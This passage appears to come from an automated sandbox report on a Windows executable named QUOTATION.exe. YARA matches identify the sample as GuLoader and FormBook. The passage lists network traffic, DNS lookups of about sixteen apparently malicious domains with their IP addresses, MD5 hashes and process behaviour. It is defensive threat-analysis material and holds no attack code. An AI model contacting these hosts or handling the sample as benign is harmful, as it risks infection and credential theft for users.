                                                                                                                          Mar 20, 2023 15:18:03.933172941 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.933223009 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.933223009 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.933623075 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.933774948 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.933775902 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.933830023 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.933830023 CET49835443192.168.11.20162.240.73.101

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Mar 20, 2023 15:18:02.592252970 CET6180853192.168.11.201.1.1.1
                                                                                                                          Mar 20, 2023 15:18:02.608556032 CET53618081.1.1.1192.168.11.20
                                                                                                                          Mar 20, 2023 15:19:18.531541109 CET5578453192.168.11.201.1.1.1
                                                                                                                          Mar 20, 2023 15:19:18.711512089 CET53557841.1.1.1192.168.11.20
                                                                                                                          Mar 20, 2023 15:19:33.949167967 CET5704353192.168.11.201.1.1.1
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET53570431.1.1.1192.168.11.20
                                                                                                                          Mar 20, 2023 15:19:47.336872101 CET5686853192.168.11.201.1.1.1
                                                                                                                          Mar 20, 2023 15:19:48.350766897 CET5686853192.168.11.209.9.9.9
                                                                                                                          Mar 20, 2023 15:19:48.455698967 CET53568689.9.9.9192.168.11.20
                                                                                                                          Mar 20, 2023 15:20:01.864418030 CET5395253192.168.11.209.9.9.9
                                                                                                                          Mar 20, 2023 15:20:01.883713961 CET53539529.9.9.9192.168.11.20
                                                                                                                          Mar 20, 2023 15:20:14.548655987 CET6081353192.168.11.209.9.9.9
                                                                                                                          Mar 20, 2023 15:20:14.876192093 CET53608139.9.9.9192.168.11.20
                                                                                                                          Mar 20, 2023 15:20:28.718548059 CET5726153192.168.11.209.9.9.9
                                                                                                                          Mar 20, 2023 15:20:29.266885042 CET53572619.9.9.9192.168.11.20
                                                                                                                          Mar 20, 2023 15:20:43.120465040 CET6346453192.168.11.209.9.9.9
                                                                                                                          Mar 20, 2023 15:20:43.541076899 CET53634649.9.9.9192.168.11.20
                                                                                                                          Mar 20, 2023 15:21:01.256917000 CET5886853192.168.11.209.9.9.9
                                                                                                                          Mar 20, 2023 15:21:01.581758022 CET53588689.9.9.9192.168.11.20
                                                                                                                          Mar 20, 2023 15:21:15.082705021 CET5370553192.168.11.209.9.9.9
                                                                                                                          Mar 20, 2023 15:21:15.100657940 CET53537059.9.9.9192.168.11.20
                                                                                                                          Mar 20, 2023 15:21:23.158859015 CET6115153192.168.11.209.9.9.9
                                                                                                                          Mar 20, 2023 15:21:23.171194077 CET53611519.9.9.9192.168.11.20
                                                                                                                          Mar 20, 2023 15:21:35.843214989 CET5077753192.168.11.209.9.9.9
                                                                                                                          Mar 20, 2023 15:21:35.862637043 CET53507779.9.9.9192.168.11.20
                                                                                                                          Mar 20, 2023 15:21:48.528294086 CET6339153192.168.11.209.9.9.9
                                                                                                                          Mar 20, 2023 15:21:49.542886019 CET6339153192.168.11.201.1.1.1
                                                                                                                          Mar 20, 2023 15:21:50.192517996 CET53633911.1.1.1192.168.11.20
                                                                                                                          Mar 20, 2023 15:21:50.282391071 CET53633919.9.9.9192.168.11.20
                                                                                                                          Mar 20, 2023 15:23:40.617893934 CET5221753192.168.11.201.1.1.1
                                                                                                                          Mar 20, 2023 15:23:40.659782887 CET53522171.1.1.1192.168.11.20
                                                                                                                          Mar 20, 2023 15:23:53.302267075 CET5488453192.168.11.201.1.1.1
                                                                                                                          Mar 20, 2023 15:23:53.482983112 CET53548841.1.1.1192.168.11.20
                                                                                                                          Mar 20, 2023 15:24:06.127868891 CET5048153192.168.11.201.1.1.1
                                                                                                                          Mar 20, 2023 15:24:06.316566944 CET53504811.1.1.1192.168.11.20
                                                                                                                          Mar 20, 2023 15:24:19.062555075 CET5144753192.168.11.201.1.1.1
                                                                                                                          Mar 20, 2023 15:24:19.372790098 CET53514471.1.1.1192.168.11.20

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Mar 20, 2023 15:18:02.592252970 CET192.168.11.201.1.1.10x1c4dStandard query (0)www.wittofitentertainment.comA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:18.531541109 CET192.168.11.201.1.1.10x98a8Standard query (0)www.interactive-media.ruA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:33.949167967 CET192.168.11.201.1.1.10xba84Standard query (0)www.cardinialethanol.comA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:47.336872101 CET192.168.11.201.1.1.10x75cfStandard query (0)www.flaviosilva.onlineA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:48.350766897 CET192.168.11.209.9.9.90x75cfStandard query (0)www.flaviosilva.onlineA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:20:01.864418030 CET192.168.11.209.9.9.90x4fadStandard query (0)www.solya-shop.comA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:20:14.548655987 CET192.168.11.209.9.9.90xe38eStandard query (0)www.buymyenergy.comA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:20:28.718548059 CET192.168.11.209.9.9.90x120aStandard query (0)www.184411.comA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:20:43.120465040 CET192.168.11.209.9.9.90x5dd8Standard query (0)www.b-tek.mediaA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:01.256917000 CET192.168.11.209.9.9.90x4796Standard query (0)www.dexmart.xyzA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:15.082705021 CET192.168.11.209.9.9.90x3a80Standard query (0)www.finelinetackdirect.comA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:23.158859015 CET192.168.11.209.9.9.90x12feStandard query (0)www.maxhaidt.comA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:35.843214989 CET192.168.11.209.9.9.90xdaa5Standard query (0)www.ghostdyes.netA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:48.528294086 CET192.168.11.209.9.9.90xd7e4Standard query (0)www.aznqmd.comA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:49.542886019 CET192.168.11.201.1.1.10xd7e4Standard query (0)www.aznqmd.comA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:23:40.617893934 CET192.168.11.201.1.1.10xde40Standard query (0)www.texasgent.comA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:23:53.302267075 CET192.168.11.201.1.1.10xf0c7Standard query (0)www.brightfms.comA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:24:06.127868891 CET192.168.11.201.1.1.10xf233Standard query (0)www.eta-trader.netA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:24:19.062555075 CET192.168.11.201.1.1.10x3a4cStandard query (0)www.funvacayflorida.comA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Mar 20, 2023 15:18:02.608556032 CET1.1.1.1192.168.11.200x1c4dNo error (0)www.wittofitentertainment.com162.240.73.101A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:18.711512089 CET1.1.1.1192.168.11.200x98a8No error (0)www.interactive-media.ru88.212.206.251A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET1.1.1.1192.168.11.200xba84No error (0)www.cardinialethanol.com45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET1.1.1.1192.168.11.200xba84No error (0)www.cardinialethanol.com72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET1.1.1.1192.168.11.200xba84No error (0)www.cardinialethanol.com96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET1.1.1.1192.168.11.200xba84No error (0)www.cardinialethanol.com45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET1.1.1.1192.168.11.200xba84No error (0)www.cardinialethanol.com198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET1.1.1.1192.168.11.200xba84No error (0)www.cardinialethanol.com45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET1.1.1.1192.168.11.200xba84No error (0)www.cardinialethanol.com45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET1.1.1.1192.168.11.200xba84No error (0)www.cardinialethanol.com173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET1.1.1.1192.168.11.200xba84No error (0)www.cardinialethanol.com72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET1.1.1.1192.168.11.200xba84No error (0)www.cardinialethanol.com45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET1.1.1.1192.168.11.200xba84No error (0)www.cardinialethanol.com45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:34.082026005 CET1.1.1.1192.168.11.200xba84No error (0)www.cardinialethanol.com45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:48.455698967 CET9.9.9.9192.168.11.200x75cfNo error (0)www.flaviosilva.onlineflaviosilva.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:19:48.455698967 CET9.9.9.9192.168.11.200x75cfNo error (0)flaviosilva.online2.57.90.16A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:20:01.883713961 CET9.9.9.9192.168.11.200x4fadNo error (0)www.solya-shop.com217.160.0.217A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:20:14.876192093 CET9.9.9.9192.168.11.200xe38eNo error (0)www.buymyenergy.com45.194.145.38A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:20:29.266885042 CET9.9.9.9192.168.11.200x120aNo error (0)www.184411.combb.zhanghonghong.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:20:29.266885042 CET9.9.9.9192.168.11.200x120aNo error (0)bb.zhanghonghong.com154.215.156.6A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:20:43.541076899 CET9.9.9.9192.168.11.200x5dd8No error (0)www.b-tek.media91.184.0.24A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:01.581758022 CET9.9.9.9192.168.11.200x4796No error (0)www.dexmart.xyz199.192.26.35A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:15.100657940 CET9.9.9.9192.168.11.200x3a80Name error (3)www.finelinetackdirect.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:23.171194077 CET9.9.9.9192.168.11.200x12feNo error (0)www.maxhaidt.com104.21.45.96A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:23.171194077 CET9.9.9.9192.168.11.200x12feNo error (0)www.maxhaidt.com172.67.212.220A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:35.862637043 CET9.9.9.9192.168.11.200xdaa5No error (0)www.ghostdyes.netgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:35.862637043 CET9.9.9.9192.168.11.200xdaa5No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:35.862637043 CET9.9.9.9192.168.11.200xdaa5No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:50.192517996 CET1.1.1.1192.168.11.200xd7e4No error (0)www.aznqmd.com23.83.160.9A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:21:50.282391071 CET9.9.9.9192.168.11.200xd7e4No error (0)www.aznqmd.com23.83.160.9A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:23:40.659782887 CET1.1.1.1192.168.11.200xde40No error (0)www.texasgent.com81.17.29.148A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:23:53.482983112 CET1.1.1.1192.168.11.200xf0c7No error (0)www.brightfms.com81.17.18.196A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:24:06.316566944 CET1.1.1.1192.168.11.200xf233No error (0)www.eta-trader.neteta-trader.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:24:06.316566944 CET1.1.1.1192.168.11.200xf233No error (0)eta-trader.net2.57.90.16A (IP address)IN (0x0001)false
                                                                                                                          Mar 20, 2023 15:24:19.372790098 CET1.1.1.1192.168.11.200x3a4cNo error (0)www.funvacayflorida.com208.91.197.91A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • www.wittofitentertainment.com
                                                                                                                          • www.interactive-media.ru
                                                                                                                          • www.cardinialethanol.com
                                                                                                                          • www.flaviosilva.online
                                                                                                                          • www.solya-shop.com
                                                                                                                          • www.buymyenergy.com
                                                                                                                          • www.184411.com
                                                                                                                          • www.b-tek.media
                                                                                                                          • www.dexmart.xyz
                                                                                                                          • www.maxhaidt.com
                                                                                                                          • www.ghostdyes.net
                                                                                                                          • www.aznqmd.com
                                                                                                                          • www.texasgent.com
                                                                                                                          • www.brightfms.com
                                                                                                                          • www.eta-trader.net
                                                                                                                          • www.funvacayflorida.com

                                                                                                                          Statistics

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:15:16:52
                                                                                                                          Start date:20/03/2023
                                                                                                                          Path:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:690832 bytes
                                                                                                                          MD5 hash:9F23CCACD955392C62B1B5D4BE4ED690
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000003.3060874680.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.3674014091.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3674014091.0000000004F87000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low

                                                                                                                          General

                                                                                                                          Target ID:8
                                                                                                                          Start time:15:17:50
                                                                                                                          Start date:20/03/2023
                                                                                                                          Path:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:690832 bytes
                                                                                                                          MD5 hash:9F23CCACD955392C62B1B5D4BE4ED690
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.4282173420.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:low

                                                                                                                          General

                                                                                                                          Target ID:9
                                                                                                                          Start time:15:18:57
                                                                                                                          Start date:20/03/2023
                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                          Imagebase:0x7ff7c6e90000
                                                                                                                          File size:4849904 bytes
                                                                                                                          MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate

                                                                                                                          General

                                                                                                                          Target ID:10
                                                                                                                          Start time:15:19:03
                                                                                                                          Start date:20/03/2023
                                                                                                                          Path:C:\Windows\SysWOW64\help.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                                          Imagebase:0x9b0000
                                                                                                                          File size:10240 bytes
                                                                                                                          MD5 hash:DD40774E56D4C44B81F2DFA059285E75
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:moderate

                                                                                                                          General

                                                                                                                          Target ID:11
                                                                                                                          Start time:15:19:24
                                                                                                                          Start date:20/03/2023
                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                          Imagebase:0x7ff793fc0000
                                                                                                                          File size:597432 bytes
                                                                                                                          MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate

                                                                                                                          Disassembly

                                                                                                                          No disassembly